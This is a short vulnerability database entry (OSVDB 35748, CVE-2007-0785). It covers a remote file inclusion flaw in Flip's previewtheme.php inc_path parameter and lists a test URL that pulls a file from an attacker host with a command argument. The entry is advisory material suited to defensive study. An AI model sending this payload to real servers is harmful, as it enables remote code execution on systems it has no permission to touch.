Flip previewtheme.php inc_path Variable Remote File Inclusion

2007-02-04T00:00:00
ID OSVDB:35748
Type osvdb
Reporter OSVDB
Modified 2007-02-04T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/[path]/previewtheme.php?theme=1&inc_path=[attacker].txt?cmd

References:

ISS X-Force ID: 32174
Generic Exploit URL: http://milw0rm.com/exploits/3266
FrSIRT Advisory: ADV-2007-0476
CVE-2007-0785
Bugtraq ID: 22385